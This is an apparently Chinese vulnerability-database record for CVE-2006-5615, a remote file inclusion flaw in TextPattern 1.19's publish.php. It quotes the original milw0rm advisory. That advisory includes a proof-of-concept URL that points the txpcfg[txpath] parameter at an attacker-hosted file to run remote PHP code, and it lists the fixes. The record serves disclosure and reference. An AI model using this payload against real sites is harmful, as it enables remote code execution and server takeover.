https://www.exploit-db.com/exploits/2646
https://cxsecurity.com/issue/WLB-2006100156
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-520
TextPattern 'Publish.PHP'远程文件包含漏洞
| 漏洞ID | 1111386 | 漏洞类型 | 输入验证 |
| 发布时间 | 2006-10-25 | 更新时间 | 2006-11-01 |
 CVE编号
|
CVE-2006-5615 |  CNNVD-ID
|
CNNVD-200610-520 |
| 漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Textpattern1.19的publish.php中存在PHP远程文件包含漏洞,在启用register_globals的情况下,远程攻击者可以通过txpcfg[txpath]参数中的URL来执行任意PHP代码。
|漏洞EXP
----------------------------------------------------------------------------
TextPattern <=g1.19 (txpcfg[txpath]) Remote File Inclusion Vulnerability
----------------------------------------------------------------------------
Author : Zeni Susanto A.K.A Bithedz
Date Found : October, 25th 2006
Location : Indonesia,Bandung
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application : TextPattern
version : <=g1.19
URL : http://textpattern.com/deanload/textpattern_g119.zip
textpattern is A free, flexible, elegant, easy-to-use content management system for all kinds of websites, even weblogs.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~
In file publish.php I found vulnerability script
--------------------------publish.php---------------------------------------
define("txpath",$txpcfg['txpath']);
----------------------------------------------------------------------------
Input passed to the "txpcfg['txpath']" parameter in publish.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.
Proof Of Concept:
~~~~~~~~~~~~
http://yourtargetsite/[textpattern_g119_path]/textpattern/publish.php?txpcfg[txpath]=http://attact/colok.txt?
Solution:
~~~~
- Sanitize variable $txpcfg['txpath'] on affected files.
- Turn off register_globals
---------------------------------------------------------------------------
Shoutz:
~
~ K-159
~ Monik My Brain
~ #bridge (silent) @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~
bithedz[at]gmail[dot]com
# milw0rm.com [2006-10-25]|参考资料
来源:BID
名称:20769
链接:http://www.securityfocus.com/bid/20769
来源:BUGTRAQ
名称:20061027TextPattern<=1.19RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/449907/100/0/threaded
来源:SREASON
名称:1794
链接:http://securityreason.com/securityalert/1794
检索漏洞
开始时间
结束时间